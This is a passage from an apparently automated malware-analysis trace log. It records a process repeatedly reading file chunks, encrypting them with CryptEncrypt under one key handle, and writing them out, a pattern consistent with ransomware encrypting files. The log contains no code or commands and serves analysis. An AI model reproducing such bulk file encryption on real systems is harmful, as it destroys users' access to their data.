lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.787] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.787] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.787] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.787] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.788] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.788] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.788] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.788] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.788] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.788] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.788] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.788] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.789] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.789] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.789] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.789] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.789] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.789] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.789] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.789] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.790] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.790] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.790] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.790] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.790] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.790] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.790] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.790] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.790] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.790] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.791] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.791] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.791] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.791] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.791] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.791] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.791] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.792] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.792] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.792] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.792] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.792] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.792] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.792] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.793] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.793] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.793] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.793] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.793] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.793] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.794] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.794] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.794] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.794] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.794] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.794] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.794] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.794] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.795] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.795] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.795] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.795] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.795] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.795] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.795] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.795] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.795] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.795] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.795] CryptEncrypt (in: hKey=0x2fa748, 